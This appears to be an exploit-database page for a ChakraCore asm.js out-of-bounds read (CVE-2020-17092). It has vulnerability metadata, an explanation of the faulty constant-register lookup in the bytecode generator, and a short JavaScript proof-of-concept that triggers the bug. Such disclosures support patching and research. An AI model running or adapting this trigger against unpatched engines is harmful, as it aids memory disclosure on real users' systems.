header-logo
Suggest Exploit
vendor:
ChakraCore
by:
Microsoft Security Response Center
7.8
CVSS
HIGH
Out-of-bounds Read
125
CWE
Product Name: ChakraCore
Affected Version From: ChakraCore 1.11.0
Affected Version To: ChakraCore 1.11.19
Patch Exists: YES
Related CWE: CVE-2020-17092
CPE: a:microsoft:chakracore:1.11.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-17092/
Other Scripts: N/A
Platforms Tested: Windows
2020

Chakra OOB Read Vulnerability

Chakra, the JavaScript engine in Microsoft Edge, is vulnerable to an out-of-bounds read vulnerability. This vulnerability occurs when a variable is initialized with a double constant, but the double constant table fails to find the int value. This leads to an out-of-bounds read, which can be exploited to gain access to sensitive information.

Mitigation:

Microsoft has released a security update to address this vulnerability.
Source

Exploit-DB raw data:

/*
Here's a snippet of AsmJSByteCodeGenerator::EmitAsmJsFunctionBody.
        AsmJsVar * initSource = nullptr;
        if (decl->sxVar.pnodeInit->nop == knopName)
        {
            AsmJsSymbol * initSym = mCompiler->LookupIdentifier(decl->sxVar.pnodeInit->name(), mFunction);
            if (initSym->GetSymbolType() == AsmJsSymbol::Variable)
            {
                // in this case we are initializing with value of a constant var
                initSource = initSym->Cast<AsmJsVar>();
            }
            ...
        }
        ...
        if (initSource)
        {
            if (var->GetType().isDouble())
            {
                mWriter.AsmReg2(Js::OpCodeAsmJs::Ld_Db, var->GetLocation(), mFunction->GetConstRegister<double>(initSource->GetDoubleInitialiser()));
            }

Chakra thinks the PoC is valid asm.js code. What happens when the variable "b" gets initialized is:
1. mCompiler->LookupIdentifier is called with "a" as the first argument. And it returns the local variable "a", which is of type int, but not the double constant "a".
2. mFunction->GetConstRegister fails to find the int value in the double constant table. So it returns -1 which leads OOB read.

PoC:
*/

function createModule() {
    'use asm';
    const a = 1.0;
    function f() {
        var b = a;
        var a = 0;
    }

    return f;
}
var f = createModule();
f();

Navigation

Suggest Exploit

Services By CQR